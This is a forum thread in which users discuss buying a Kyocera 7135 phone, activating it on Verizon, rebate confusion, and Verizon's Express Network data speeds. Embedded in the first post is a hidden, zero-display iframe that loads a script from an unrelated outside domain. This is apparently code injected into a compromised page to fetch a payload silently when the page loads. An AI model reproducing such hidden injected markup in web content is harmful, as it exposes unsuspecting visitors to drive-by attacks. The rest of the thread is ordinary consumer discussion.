I ordered mine tuesday morning at 8:05am. It was just delivered at 8:45am today (thurs). Now that's fast.
I'm going to verizon dealer at lunch to activate it.
I'll post more after lunch... perhaps if all goes well, i'll post from the phone <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
Um, what good is the discount if you already have the phone? Also, since they haven't approved it yet, good luck getting it activated, let alone programmed. None of them will know how.
BTW, how can they offer a rebate on a handset they don't sell?
Yes, please clarify. How and why is Verizon giving you a $100 discount on a phone you bought elsewhere and that they are telling most people they wont even allow on the network. That would be a rebate I think not a discount anyways. Maybe they are just offering to put a $100 + first month of express network credit on your account, as a sort of special sales deal (and of course they can verbally say its for anything).
The only thing odd was when i gave them the
esn from the inside of the phone, they said it
was coming up as an old dual-band qualcomm phone. With that they said they could not credit me for extra roaming minutes.
However, everything seems to be fine as i am not roaming right now.
The phone is activated and already to go.
It took about an hour and a half to get fully charged up.
I am also from Chicago...did you call an 800 number or a local office here in town. Who did you talk to? It would be nice to talk with someone who already has a clue.
I would be interested to hear how it works for you as I am anxious to finally jump ship from my old (and I mean old!!)Cingular tdma startac 8500 to the 7135.
Please let us know how everything turns out.
John

Not only that (in refernece to knowing with whom you had spoken with), I would really consider buying one from Kyocera today, if I could get that same Verizon deal.
What branding does the phone have, Kyocera? Alltel's not anywhere on there, is it?

Wow! If Verizon makes a regular practice of this, I no longer have any excuse. The NE2 discount was the only reason to wait until Verizon sold the phones.
For those that are still waiting for your shipment confirmation e-mail you may want to call and check the status. I ordered mine on 12/23 and hadn't received an e-mail and the online status still said 'processing'.
I just called and they said it shipped on 12/24
It figures, seconds after I called, I received the e-mail.
Does anybody know the deal with the express network service from Verizon? I have tye 6135 now and it just uses regular minutes for data service. It sounds like I'll need another plan for the 7135? Is this the difference in the speed between Alltel and Verizon?

You can continue using the same service (called QNC) on Verizon if you want, but Express Network is 3G (actually 1xRTT service) and is significantly faster then QNC. It can peak up to 153Kbs, but you should regularly see data in the 40Kbs range (QNC maxes out at 14.4kbs)
